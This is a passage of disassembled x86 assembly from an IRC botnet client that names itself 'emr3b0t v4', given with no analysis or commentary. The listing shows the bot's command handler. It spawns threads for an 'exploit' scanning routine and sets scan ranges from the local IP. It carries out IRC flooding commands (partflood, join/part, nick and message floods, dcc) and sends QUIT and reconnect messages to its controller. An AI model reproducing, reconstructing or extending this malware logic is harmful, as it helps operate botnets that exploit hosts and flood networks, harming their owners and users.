neg eax
sbb eax, eax
pop ecx
inc eax
pop ecx
mov [ebp+var_B40], eax
jmp short loc_40459B
; ---------------------------------------------------------------------------
loc_404595: ; CODE XREF: sub_401C87+28F2�j
mov [ebp+var_B40], ebx
loc_40459B: ; CODE XREF: sub_401C87+290C�j
lea eax, [ebp+var_2C0]
push offset dword_440D00
push eax
call sub_41EA60
push ebx
lea eax, [ebp+var_2C0]
push 28h
push eax
call sub_40B691
add esp, 14h
mov [ebp+var_B44], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_BC8]
push ebx
push eax
push offset sub_40B6FC
push ebx
push ebx
call ds:dword_4F5350 ; CreateThread
mov ecx, [ebp+var_B44]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_455F14[ecx], eax
jnz short loc_40461B
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
push offset unk_440D20
loc_4045FF: ; CODE XREF: sub_401C87+77EA�j
lea eax, [ebp+var_2C0]
push eax
call sub_41EA60
add esp, 0Ch
jmp loc_406F3F
; ---------------------------------------------------------------------------
loc_404613: ; CODE XREF: sub_401C87+299A�j
push 32h
call ds:dword_4F534C ; Sleep
loc_40461B: ; CODE XREF: sub_401C87+296A�j
cmp [ebp+var_B34], ebx
jz short loc_404613
jmp loc_406F3F
; ---------------------------------------------------------------------------
loc_404628: ; CODE XREF: sub_401C87+1636�j
; sub_401C87+164B�j
push offset aTarab ; "Tarab"
lea eax, [ebp+var_2C0]
push offset dword_440D5C
push eax
call sub_41EA60
push ebx
lea eax, [ebp+var_2C0]
push [ebp+var_4]
push eax
push [ebp+var_88]
push [ebp+arg_4]
call sub_409C75
add esp, 20h
jmp loc_406F3F
; ---------------------------------------------------------------------------
loc_40465F: ; CODE XREF: sub_401C87+160C�j
; sub_401C87+1621�j
push ds:dword_4E2D04
call sub_41B51B
push eax
lea eax, [ebp+var_2C0]
push offset unk_440D74
push eax
call sub_41EA60
push ebx
lea eax, [ebp+var_2C0]
push [ebp+var_4]
push eax
push [ebp+var_88]
push [ebp+arg_4]
call sub_409C75
add esp, 24h
jmp loc_406F3F
; ---------------------------------------------------------------------------
loc_40469D: ; CODE XREF: sub_401C87+15E2�j
; sub_401C87+15F7�j
mov esi, [ebp+esi+var_8C]
cmp esi, ebx
jz short loc_4046CF
cmp [ebp+var_C], ebx
jz short loc_4046DE
push esi
push [ebp+var_C]
call sub_41EBB0
pop ecx
cmp eax, ebx
pop ecx
jz short loc_4046DE
push eax
push offset aQuitS ; "QUIT :%s\r\n"
push [ebp+arg_4]
call sub_409C2F
add esp, 0Ch
jmp short loc_4046DE
; ---------------------------------------------------------------------------
loc_4046CF: ; CODE XREF: sub_401C87+2A1F�j
push offset aQuitLater ; "QUIT :later\r\n"
push [ebp+arg_4]
call sub_409C2F
pop ecx
pop ecx
loc_4046DE: ; CODE XREF: sub_401C87+2A24�j
; sub_401C87+2A33�j ...
push 0FFFFFFFEh
pop eax
jmp loc_409C2A
; ---------------------------------------------------------------------------
loc_4046E6: ; CODE XREF: sub_401C87+15B8�j
; sub_401C87+15CD�j
push offset aQuitDisconnect ; "QUIT :disconnecting\r\n"
push [ebp+arg_4]
call sub_409C2F
push offset dword_440DD4
call sub_415A3C
add esp, 0Ch
or eax, 0FFFFFFFFh
jmp loc_409C2A
; ---------------------------------------------------------------------------
loc_404708: ; CODE XREF: sub_401C87+158E�j
; sub_401C87+15A3�j
push offset aQuitReconnecti ; "QUIT :reconnecting\r\n"
push [ebp+arg_4]
call sub_409C2F
push offset dword_440E08
call sub_415A3C
add esp, 0Ch
jmp loc_4099D3
; ---------------------------------------------------------------------------
loc_404727: ; CODE XREF: sub_401C87+1564�j
; sub_401C87+1579�j
push [ebp+var_4]
push [ebp+var_88]
push [ebp+arg_4]
call sub_40BD5A
jmp loc_404AE3
; ---------------------------------------------------------------------------
loc_40473D: ; CODE XREF: sub_401C87+153A�j
; sub_401C87+154F�j
push [ebp+var_4]
push [ebp+var_88]
push [ebp+arg_4]
call sub_40BD06
jmp loc_404AE3
; ---------------------------------------------------------------------------
loc_404753: ; CODE XREF: sub_401C87+1510�j
; sub_401C87+1525�j
push [ebp+var_4]
push [ebp+var_88]
push [ebp+arg_4]
call sub_40BC9B
jmp loc_404AE3
; ---------------------------------------------------------------------------
loc_404769: ; CODE XREF: sub_401C87+14E6�j
; sub_401C87+14FB�j
push [ebp+var_4]
push [ebp+var_88]
push [ebp+arg_4]
call sub_40BBCD
jmp loc_404AE3
; ---------------------------------------------------------------------------
loc_40477F: ; CODE XREF: sub_401C87+1441�j
; sub_401C87+1456�j
push [ebp+esi+var_8C]
push 27h
push offset dword_440E24
push offset dword_440E34
jmp loc_402C8F
; ---------------------------------------------------------------------------
loc_404797: ; CODE XREF: sub_401C87+1417�j
; sub_401C87+142C�j
push [ebp+esi+var_8C]
push 24h
push offset dword_440E44
push offset dword_440E50
jmp loc_402C8F
; ---------------------------------------------------------------------------
loc_4047AF: ; CODE XREF: sub_401C87+1033�j
; sub_401C87+1048�j
mov edi, [ebp+esi+var_8C]
cmp edi, ebx
jz short loc_4047CE
push edi
call sub_41E710
test eax, eax
pop ecx
jz short loc_4047CE
push edi
call sub_41E710
pop ecx
jmp short loc_4047D3
; ---------------------------------------------------------------------------
loc_4047CE: ; CODE XREF: sub_401C87+2B31�j
; sub_401C87+2B3C�j
mov eax, ds:dword_43F078
loc_4047D3: ; CODE XREF: sub_401C87+2B45�j
mov esi, [ebp+esi+var_88]
mov [ebp+var_590], eax
cmp esi, ebx
jz short loc_4047F8
push esi
loc_4047E5: ; CODE XREF: sub_401C87+2B80�j
lea eax, [ebp+var_5A0]
push 10h
push eax
call sub_41EC30
add esp, 0Ch
jmp short loc_40480F
; ---------------------------------------------------------------------------
loc_4047F8: ; CODE XREF: sub_401C87+2B5B�j
cmp [ebp+var_8FF], bl
jz short loc_404809
lea eax, [ebp+var_C0]
push eax
jmp short loc_4047E5
; ---------------------------------------------------------------------------
loc_404809: ; CODE XREF: sub_401C87+2B77�j
mov [ebp+var_5A0], bl
loc_40480F: ; CODE XREF: sub_401C87+2B6F�j
mov eax, [ebp+var_4]
push [ebp+var_88]
mov esi, [ebp+arg_4]
mov [ebp+var_584], eax
mov eax, [ebp+var_8]
push 80h
mov [ebp+var_580], eax
lea eax, [ebp+var_620]
push eax
mov [ebp+var_624], esi
call sub_41EC30
add esp, 0Ch
push [ebp+var_590]
push esi
call sub_40AEAD
pop ecx
push eax
lea eax, [ebp+var_2C0]
push offset dword_440E60
push eax
call sub_41EA60
push ebx
lea eax, [ebp+var_2C0]
push 19h
push eax
call sub_40B691
add esp, 1Ch
mov [ebp+var_58C], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_624]
push ebx
push eax
push offset sub_411AAE
push ebx
push ebx
call ds:dword_4F5350 ; CreateThread
mov ecx, [ebp+var_58C]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_455F14[ecx], eax
jnz short loc_4048C3
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
push offset dword_440E88
jmp loc_40220D
; ---------------------------------------------------------------------------
loc_4048BB: ; CODE XREF: sub_401C87+2C42�j
push 32h
call ds:dword_4F534C ; Sleep
loc_4048C3: ; CODE XREF: sub_401C87+2C21�j
cmp [ebp+var_57C], ebx
jz short loc_4048BB
jmp loc_4076C4
; ---------------------------------------------------------------------------
loc_4048D0: ; CODE XREF: sub_401C87+FC9�j
; sub_401C87+FDE�j
mov esi, [ebp+esi+var_8C]
cmp esi, ebx
jz short loc_4048F0
push esi
call sub_41E710
test ax, ax
pop ecx
jz short loc_4048F0
push esi
call sub_41E710
pop ecx
jmp short loc_4048F6
; ---------------------------------------------------------------------------
loc_4048F0: ; CODE XREF: sub_401C87+2C52�j
; sub_401C87+2C5E�j
mov ax, ds:word_43F088
loc_4048F6: ; CODE XREF: sub_401C87+2C67�j
push [ebp+var_88]
mov esi, [ebp+arg_4]
mov edi, [ebp+var_4]
mov [ebp+var_97C], ax
mov eax, [ebp+var_8]
push 80h
mov [ebp+var_96C], eax
lea eax, [ebp+var_9FC]
push eax
mov [ebp+var_A00], esi
mov [ebp+var_970], edi
call sub_41EC30
movzx eax, [ebp+var_97C]
add esp, 0Ch
push eax
push esi
call sub_40AEAD
pop ecx
push eax
lea eax, [ebp+var_2C0]
push offset unk_440EC4
push eax
call sub_41EA60
push ebx
lea eax, [ebp+var_2C0]
push edi
push eax
push [ebp+var_88]
push esi
call sub_409C75
push ebx
lea eax, [ebp+var_2C0]
push 6
push eax
call sub_40B691
add esp, 30h
mov [ebp+var_978], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_A00]
push ebx
push eax
push offset sub_40EE63
push ebx
push ebx
call ds:dword_4F5350 ; CreateThread
mov ecx, [ebp+var_978]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_455F14[ecx], eax
jnz short loc_4049C8
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
push offset unk_440EF0
jmp loc_40220D
; ---------------------------------------------------------------------------
loc_4049C0: ; CODE XREF: sub_401C87+2D47�j
push 32h
call ds:dword_4F534C ; Sleep
loc_4049C8: ; CODE XREF: sub_401C87+2D26�j
cmp [ebp+var_968], ebx
jz short loc_4049C0
jmp loc_4076C4
; ---------------------------------------------------------------------------
loc_4049D5: ; CODE XREF: sub_401C87+F75�j
; sub_401C87+F8A�j ...
push edi
push offset aSecure_0 ; "secure"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz short loc_4049FD
push edi
push offset aSec_0 ; "sec"
call sub_41F7E0
pop ecx
mov [ebp+var_A10], ebx
test eax, eax
pop ecx
jnz short loc_404A07
loc_4049FD: ; CODE XREF: sub_401C87+2D5D�j
mov [ebp+var_A10], 1
loc_404A07: ; CODE XREF: sub_401C87+2D74�j
push [ebp+var_88]
lea eax, [ebp+var_A94]
push 80h
push eax
call sub_41EC30
mov eax, [ebp+arg_4]
add esp, 0Ch
cmp [ebp+var_A10], ebx
mov [ebp+var_A98], eax
mov eax, [ebp+var_4]
mov [ebp+var_A0C], eax
mov eax, [ebp+var_8]
mov [ebp+var_A08], eax
mov eax, offset aSecuring ; "Securing"
jnz short loc_404A4E
mov eax, offset aUnsecuring ; "Unsecuring"
loc_404A4E: ; CODE XREF: sub_401C87+2DC0�j
push eax
push offset dword_440F54
lea eax, [ebp+var_2C0]
push 200h
push eax
call sub_41EC30
push ebx
lea eax, [ebp+var_2C0]
push 22h
push eax
call sub_40B691
add esp, 1Ch
mov [ebp+var_A14], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_A98]
push ebx
push eax
push offset sub_41AAA5
push ebx
push ebx
call ds:dword_4F5350 ; CreateThread
mov ecx, [ebp+var_A14]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_455F14[ecx], eax
jnz short loc_404AC5
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
push offset dword_440F70
jmp loc_4085EB
; ---------------------------------------------------------------------------
loc_404ABD: ; CODE XREF: sub_401C87+2E44�j
push 32h
call ds:dword_4F534C ; Sleep
loc_404AC5: ; CODE XREF: sub_401C87+2E23�j
cmp [ebp+var_A04], ebx
jz short loc_404ABD
jmp loc_402593
; ---------------------------------------------------------------------------
loc_404AD2: ; CODE XREF: sub_401C87+F4B�j
; sub_401C87+F60�j
push [ebp+var_4]
push [ebp+var_88]
push [ebp+arg_4]
call sub_41B33E
loc_404AE3: ; CODE XREF: sub_401C87+2AB1�j
; sub_401C87+2AC7�j ...
add esp, 0Ch
jmp loc_409A67
; ---------------------------------------------------------------------------
loc_404AEB: ; CODE XREF: sub_401C87+F21�j
; sub_401C87+F36�j
push offset unk_440FB0
jmp loc_40649E
; ---------------------------------------------------------------------------
loc_404AF5: ; CODE XREF: sub_401C87+EF7�j
; sub_401C87+F0C�j
push offset aEmr3b0tV4 ; "emr3b0t v4"
push offset dword_441060
jmp loc_406F0F
; ---------------------------------------------------------------------------
loc_404B04: ; CODE XREF: sub_401C87+ECD�j
; sub_401C87+EE2�j
mov esi, [ebp+esi+var_8C]
cmp esi, ebx
jz short loc_404B60
push esi
call sub_41E710
cmp eax, ebx
pop ecx
jl short loc_404B55
cmp eax, 3
jge short loc_404B55
mov edx, [ebp+arg_18]
mov ecx, eax
shl ecx, 7
lea esi, [ecx+edx]
cmp [esi], bl
jz short loc_404B4A
lea eax, [esi+1]
push eax
lea eax, [ebp+var_2C0]
push offset unk_441070
push eax
call sub_41EA60
mov [esi], bl
jmp loc_40619C
; ---------------------------------------------------------------------------
loc_404B4A: ; CODE XREF: sub_401C87+2EA5�j
push eax
push offset unk_441090
jmp loc_406190
; ---------------------------------------------------------------------------
loc_404B55: ; CODE XREF: sub_401C87+2E91�j
; sub_401C87+2E96�j
push eax
push offset unk_4410BC
jmp loc_406190
; ---------------------------------------------------------------------------
loc_404B60: ; CODE XREF: sub_401C87+2E86�j
mov edi, [ebp+arg_18]
xor esi, esi
loc_404B65: ; CODE XREF: sub_401C87+2EFA�j
push [ebp+var_90]
push edi
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz short loc_404B88
inc esi
add edi, 80h
cmp esi, 3
jl short loc_404B65
jmp loc_407148
; ---------------------------------------------------------------------------
loc_404B88: ; CODE XREF: sub_401C87+2EEE�j
mov eax, [ebp+arg_18]
shl esi, 7
mov [esi+eax], bl
lea eax, [ebp+var_C0]
push eax
push offset unk_4410E8
jmp loc_406190
; ---------------------------------------------------------------------------
loc_404BA2: ; CODE XREF: sub_401C87+EA3�j
; sub_401C87+EB8�j
push [ebp+var_8C]
push offset a332_1 ; "332"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_403610
call sub_40B854
push ebx
call ds:off_4F5338
loc_404BC8: ; CODE XREF: sub_401C87+19C2�j
push offset aGet_2 ; "get"
push esi
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz loc_404C6E
cmp ds:dword_4E676C, ebx
jz short loc_404BF4
push offset dword_4E6150
push offset unk_441110
jmp loc_404C80
; ---------------------------------------------------------------------------
loc_404BF4: ; CODE XREF: sub_401C87+2F5C�j
push 10h
pop eax
mov [ebp+var_2D0], eax
push eax
lea eax, [ebp+var_2E8]
push ebx
push eax
call sub_41E4B0
add esp, 0Ch
lea eax, [ebp+var_2D0]
push eax
lea eax, [ebp+var_2E8]
push eax
push [ebp+arg_4]
call ds:dword_4F554C ; getsockname
movzx eax, [ebp+var_2E2]
push eax
movzx eax, [ebp+var_2E3]
push eax
movzx eax, [ebp+var_2E4]
push eax
lea eax, [ebp+var_E30]
push offset aD_D_D_ ; "%d.%d.%d.*"
push eax
call sub_41EA60
lea eax, [ebp+var_E30]
push eax
lea eax, [ebp+var_2C0]
push offset unk_441154
push eax
call sub_41EA60
add esp, 20h
jmp loc_403668
; ---------------------------------------------------------------------------
loc_404C6E: ; CODE XREF: sub_401C87+2F50�j
push esi
call ds:dword_4E3008 ; inet_addr
cmp eax, 0FFFFFFFFh
push esi
jnz short loc_404C94
push offset unk_44118C
loc_404C80: ; CODE XREF: sub_401C87+2F68�j
lea eax, [ebp+var_2C0]
push eax
call sub_41EA60
add esp, 0Ch
jmp loc_403668
; ---------------------------------------------------------------------------
loc_404C94: ; CODE XREF: sub_401C87+2FF2�j
push offset dword_4E6150
call sub_41F620
push esi
lea eax, [ebp+var_2C0]
push offset unk_4411C0
push eax
mov ds:dword_4E676C, 1
call sub_41EA60
add esp, 14h
jmp loc_403668
; ---------------------------------------------------------------------------
loc_404CC2: ; CODE XREF: sub_401C87+19AA�j
push edi
push offset aExploit ; "exploit"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz loc_404DBB
mov eax, [ebp+var_4]
mov esi, offset a2 ; "#2"
mov [ebp+var_13E4], eax
mov eax, [ebp+var_8]
mov [ebp+var_13E0], eax
mov eax, [ebp+arg_4]
mov [ebp+var_13F4], eax
mov edi, 80h
push esi
lea eax, [ebp+var_1474]
push edi
push eax
mov [ebp+var_13EC], 1
call sub_41EC30
push esi
lea eax, [ebp+var_14F4]
push edi
push eax
call sub_41EC30
push [ebp+arg_10]
lea eax, [ebp+var_1504]
push 10h
push eax
call sub_41EC30
lea eax, [ebp+var_1504]
push eax
lea eax, [ebp+var_2C0]
push offset unk_4411F4
push eax
call sub_41EA60
push ebx
lea eax, [ebp+var_2C0]
push 8
push eax
call sub_40B691
add esp, 3Ch
mov [ebp+var_13E8], eax
lea eax, [ebp+var_2FC]
push eax
lea eax, [ebp+var_1504]
push ebx
push eax
push offset sub_40BE20
push ebx
push ebx
call ds:dword_4F5350 ; CreateThread
mov ecx, [ebp+var_13E8]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_455F14[ecx], eax
jnz short loc_404DAE
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
push offset unk_441224
jmp loc_406190
; ---------------------------------------------------------------------------
loc_404DA6: ; CODE XREF: sub_401C87+312D�j
push 32h
call ds:dword_4F534C ; Sleep
loc_404DAE: ; CODE XREF: sub_401C87+310C�j
cmp [ebp+var_13DC], ebx
jz short loc_404DA6
jmp loc_407148
; ---------------------------------------------------------------------------
loc_404DBB: ; CODE XREF: sub_401C87+304A�j
push edi
push offset aReconnect_in ; "reconnect.in"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_4099DA
push edi
push offset aRin ; "rin"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_4099DA
push edi
push offset aReconnect_in_m ; "reconnect.in.ms"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_409994
push edi
push offset aRinms ; "rinms"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_409994
push [ebp+arg_8]
push offset aFlood ; "flood"
call sub_41F7E0
mov edi, ds:dword_4F534C
pop ecx
test eax, eax
pop ecx
jnz loc_405977
call ds:dword_4F537C ; GetTickCount
push eax
call sub_41EB60
push [ebp+arg_10]
push offset aLoad ; "load"
call sub_41F7E0
add esp, 0Ch
test eax, eax
jnz short loc_404EBE
cmp [ebp+esi+var_80], ebx
jz short loc_404EBE
push [ebp+esi+var_80]
call sub_41E710
pop ecx
push eax
push [ebp+esi+var_84]
call sub_41E710
pop ecx
push eax
push [ebp+esi+var_88]
call sub_4183AA
push [ebp+esi+var_84]
lea eax, [ebp+var_2C0]
push [ebp+esi+var_88]
push [ebp+esi+var_80]
push offset unk_4412A0
push eax
call sub_41EA60
add esp, 20h
cmp [ebp+var_8], ebx
jnz short loc_404EBE
push ebx
lea eax, [ebp+var_2C0]
push [ebp+var_4]
push eax
push [ebp+var_88]
push [ebp+arg_4]
call sub_409C75
add esp, 14h
loc_404EBE: ; CODE XREF: sub_401C87+31C3�j
; sub_401C87+31C9�j ...
push [ebp+arg_10]
push offset aPm_1 ; "pm"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz short loc_404F27
mov eax, [ebp+esi+var_84]
cmp eax, ebx
jz short loc_404F27
push offset a__6 ; " _"
push (offset a__6+2)
push eax
call sub_4189CD
push eax
lea eax, [ebp+var_50F4]
push eax
call sub_41F620
lea eax, [ebp+var_50F4]
push eax
lea eax, [ebp+var_2C0]
push [ebp+esi+var_88]
push offset aPrivmsgSS_3 ; "privmsg %s :%s"
push eax
call sub_41EA60
lea eax, [ebp+var_2C0]
push eax
call sub_4180CE
add esp, 28h
loc_404F27: ; CODE XREF: sub_401C87+3248�j
; sub_401C87+3253�j
push [ebp+arg_10]
push offset aCt ; "ct"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz short loc_404F90
mov eax, [ebp+esi+var_84]
cmp eax, ebx
jz short loc_404F90
push offset a__7 ; " _"
push (offset a__7+2)
push eax
call sub_4189CD
push eax
lea eax, [ebp+var_4BF0]
push eax
call sub_41F620
lea eax, [ebp+var_4BF0]
push eax
lea eax, [ebp+var_2C0]
push [ebp+esi+var_88]
push offset dword_4412EC
push eax
call sub_41EA60
lea eax, [ebp+var_2C0]
push eax
call sub_4180CE
add esp, 28h
loc_404F90: ; CODE XREF: sub_401C87+32B1�j
; sub_401C87+32BC�j
push [ebp+arg_10]
push offset dword_441300
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz short loc_404FF9
mov eax, [ebp+esi+var_84]
cmp eax, ebx
jz short loc_404FF9
push offset byte_441304
push offset word_441306
push eax
call sub_4189CD
push eax
lea eax, [ebp+var_46EC]
push eax
call sub_41F620
lea eax, [ebp+var_46EC]
push eax
lea eax, [ebp+var_2C0]
push [ebp+esi+var_88]
push offset dword_441308
push eax
call sub_41EA60
lea eax, [ebp+var_2C0]
push eax
call sub_4180CE
add esp, 28h
loc_404FF9: ; CODE XREF: sub_401C87+331A�j
; sub_401C87+3325�j
push [ebp+arg_10]
push offset aMode ; "mode"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz short loc_405062
mov eax, [ebp+esi+var_84]
cmp eax, ebx
jz short loc_405062
push offset asc_44131E ; " "
push offset a_ ; "_"
push eax
call sub_4189CD
push eax
lea eax, [ebp+var_4DF0]
push eax
call sub_41F620
lea eax, [ebp+var_4DF0]
push eax
lea eax, [ebp+var_2C0]
push [ebp+esi+var_88]
push offset aModeSS ; "mode %s %s"
push eax
call sub_41EA60
lea eax, [ebp+var_2C0]
push eax
call sub_4180CE
add esp, 28h
loc_405062: ; CODE XREF: sub_401C87+3383�j
; sub_401C87+338E�j
push [ebp+arg_10]
push offset aJoin ; "join"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz short loc_4050A1
mov eax, [ebp+esi+var_88]
cmp eax, ebx
jz short loc_4050A1
push eax
lea eax, [ebp+var_2C0]
push offset aJoinS ; "join %s"
push eax
call sub_41EA60
lea eax, [ebp+var_2C0]
push eax
call sub_4180CE
add esp, 10h
loc_4050A1: ; CODE XREF: sub_401C87+33EC�j
; sub_401C87+33F7�j
push [ebp+arg_10]
push offset aPart_1 ; "part"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz short loc_4050E0
mov eax, [ebp+esi+var_88]
cmp eax, ebx
jz short loc_4050E0
push eax
lea eax, [ebp+var_2C0]
push offset aPartS ; "part %s"
push eax
call sub_41EA60
lea eax, [ebp+var_2C0]
push eax
call sub_4180CE
add esp, 10h
loc_4050E0: ; CODE XREF: sub_401C87+342B�j
; sub_401C87+3436�j
push [ebp+arg_10]
push offset aPartflood ; "partflood"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz short loc_405124
mov eax, [ebp+esi+var_88]
cmp eax, ebx
jz short loc_405124
push offset aCyber ; "CYBER"
push eax
lea eax, [ebp+var_2C0]
push offset aPartSS ; "part %s %s"
push eax
call sub_41EA60
lea eax, [ebp+var_2C0]
push eax
call sub_4180CE
add esp, 14h
loc_405124: ; CODE XREF: sub_401C87+346A�j
; sub_401C87+3475�j
push [ebp+arg_10]
push offset aPnick ; "pnick"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz short loc_405199
cmp [ebp+esi+var_88], ebx
jz short loc_405199
call ds:dword_4F537C ; GetTickCount
push eax
call sub_41EB60
call sub_41EB70
cdq
mov ecx, 0F423Fh
idiv ecx
lea eax, [ebp+var_17B4]
push edx
push [ebp+esi+var_88]
push offset aSI ; "%s%i"
push eax
call sub_41EA60
lea eax, [ebp+var_17B4]
push eax
lea eax, [ebp+var_2C0]
push offset aNickS_0 ; "NICK %s"
push eax
call sub_41EA60
lea eax, [ebp+var_2C0]
push eax
call sub_4180CE
add esp, 24h
loc_405199: ; CODE XREF: sub_401C87+34AE�j
; sub_401C87+34B7�j
push [ebp+arg_10]
push offset aJoinPart ; "join/part"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz loc_4052E0
cmp [ebp+esi+var_88], ebx
jz loc_4052E0
push [ebp+esi+var_88]
lea eax, [ebp+var_2C0]
push offset aJoinS_0 ; "join %s"
push eax
call sub_41EA60
lea eax, [ebp+var_2C0]
push eax
call sub_4180CE
push offset aCyber ; "CYBER"
lea eax, [ebp+var_2C0]
push [ebp+esi+var_88]
push offset aPartSS_0 ; "part %s %s"
push eax
call sub_41EA60
lea eax, [ebp+var_2C0]
push eax
call sub_4180CE
add esp, 24h
call sub_41EB70
cdq
mov ecx, 3E8h
idiv ecx
push edx
call edi ; Sleep
push [ebp+esi+var_88]
lea eax, [ebp+var_2C0]
push offset aJoinS_1 ; "join %s"
push eax
call sub_41EA60
lea eax, [ebp+var_2C0]
push eax
call sub_4180CE
add esp, 10h
call sub_41EB70
cdq
mov ecx, 384h
idiv ecx
push edx
call edi ; Sleep
push offset aCyber ; "CYBER"
lea eax, [ebp+var_2C0]
push [ebp+esi+var_88]
push offset aPartSS_1 ; "part %s %s"
push eax
call sub_41EA60
lea eax, [ebp+var_2C0]
push eax
call sub_4180CE
push [ebp+esi+var_88]
lea eax, [ebp+var_2C0]
push offset aJoinS_2 ; "join %s"
push eax
call sub_41EA60
lea eax, [ebp+var_2C0]
push eax
call sub_4180CE
add esp, 24h
call sub_41EB70
cdq
mov ecx, 0C8h
idiv ecx
push edx
call edi ; Sleep
push offset aCyber ; "CYBER"
lea eax, [ebp+var_2C0]
push [ebp+esi+var_88]
push offset aPartSS_2 ; "part %s %s"
push eax
call sub_41EA60
lea eax, [ebp+var_2C0]
push eax
call sub_4180CE
add esp, 14h
loc_4052E0: ; CODE XREF: sub_401C87+3523�j
; sub_401C87+3530�j
push [ebp+arg_10]
push offset aDcc ; "dcc"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz loc_40537A
cmp [ebp+esi+var_88], ebx
jz short loc_40537A
call ds:dword_4F537C ; GetTickCount
push eax
call sub_41EB60
pop ecx
call sub_41EB70
cdq
mov ecx, 0F423Fh
idiv ecx
push edx
call sub_41EB70
cdq
mov ecx, 0F423Fh
idiv ecx
push edx
call sub_41EB70
cdq
mov ecx, 0F423Fh
idiv ecx
push edx
call sub_41EB70
cdq
mov ecx, 0F423Fh
idiv ecx
push edx
call sub_41EB70
cdq
mov ecx, 0F423Fh
idiv ecx
lea eax, [ebp+var_2C0]
push edx
push [ebp+esi+var_88]
push offset dword_4413CC
push eax
call sub_41EA60
lea eax, [ebp+var_2C0]
push eax
call sub_4180CE
add esp, 24h
loc_40537A: ; CODE XREF: sub_401C87+366A�j
; sub_401C87+3677�j
push [ebp+arg_10]
push offset aNick_0 ; "nick"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz loc_405477
mov eax, [ebp+esi+var_88]
cmp eax, ebx
jz loc_405477
push eax
lea eax, [ebp+var_2C0]
push offset aJoinS_3 ; "join %s"
push eax
call sub_41EA60
lea eax, [ebp+var_2C0]
push eax
call sub_4180CE
lea eax, [ebp+var_4BC]
push eax
call sub_418428
lea eax, [ebp+var_4BC]
push eax
lea eax, [ebp+var_2C0]
push offset aNickS_1 ; "NICK %s"
push eax
call sub_41EA60
lea eax, [ebp+var_2C0]
push eax
call sub_4180CE
add esp, 24h
call sub_41EB70
cdq
mov ecx, 514h
idiv ecx
push edx
call edi ; Sleep
lea eax, [ebp+var_4BC]
push eax
call sub_418428
lea eax, [ebp+var_4BC]
push eax
lea eax, [ebp+var_2C0]
push offset aNickS_2 ; "NICK %s"
push eax
call sub_41EA60
lea eax, [ebp+var_2C0]
push eax
call sub_4180CE
add esp, 14h
call sub_41EB70
cdq
mov ecx, 1F4h
idiv ecx
push edx
call edi ; Sleep
lea eax, [ebp+var_4BC]
push eax
call sub_418428
lea eax, [ebp+var_4BC]
push eax
lea eax, [ebp+var_2C0]
push offset aNickS_3 ; "NICK %s"
push eax
call sub_41EA60
lea eax, [ebp+var_2C0]
push eax
call sub_4180CE
add esp, 14h
loc_405477: ; CODE XREF: sub_401C87+3704�j
; sub_401C87+3713�j
push [ebp+arg_10]
push offset aChgnick ; "chgnick"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz short loc_4054BD
lea eax, [ebp+var_1808]
push eax
call sub_418428
lea eax, [ebp+var_1808]
push eax
lea eax, [ebp+var_2C0]
push offset aNickS_4 ; "NICK %s"
push eax
call sub_41EA60
lea eax, [ebp+var_2C0]
push eax
call sub_4180CE
add esp, 14h
loc_4054BD: ; CODE XREF: sub_401C87+3801�j
push [ebp+arg_10]
push offset aMsg ; "msg"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz loc_4055A9
cmp [ebp+esi+var_88], ebx
jz loc_4055A9
push [ebp+esi+var_88]
lea eax, [ebp+var_2C0]
push offset aJoinS_4 ; "join %s"
push eax
call sub_41EA60
lea eax, [ebp+var_2C0]
push eax
call sub_4180CE
push offset aCyber_0 ; "CYBER"
lea eax, [ebp+var_2C0]
push [ebp+esi+var_88]
push offset aPrivmsgSS ; "privmsg %s :%s"
push eax
call sub_41EA60
lea eax, [ebp+var_2C0]
push eax
call sub_4180CE
add esp, 24h
call sub_41EB70
cdq
mov ecx, 3E8h
idiv ecx
push edx
call edi ; Sleep
push offset aCyber_0 ; "CYBER"
lea eax, [ebp+var_2C0]
push [ebp+esi+var_88]
push offset aPrivmsgSS_0 ; "privmsg %s :%s"
push eax
call sub_41EA60
lea eax, [ebp+var_2C0]
push eax
call sub_4180CE
add esp, 14h
call sub_41EB70
cdq
mov ecx, 384h
idiv ecx
push edx
call edi ; Sleep
push offset aCyber_0 ; "CYBER"
lea eax, [ebp+var_2C0]
push [ebp+esi+var_88]
push offset aPrivmsgSS_1 ; "privmsg %s :%s"
push eax
call sub_41EA60
lea eax, [ebp+var_2C0]
push eax
call sub_4180CE
add esp, 14h
loc_4055A9: ; CODE XREF: sub_401C87+3847�j
; sub_401C87+3854�j
push [ebp+arg_10]
push offset aNotice_2 ; "notice"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz loc_405695
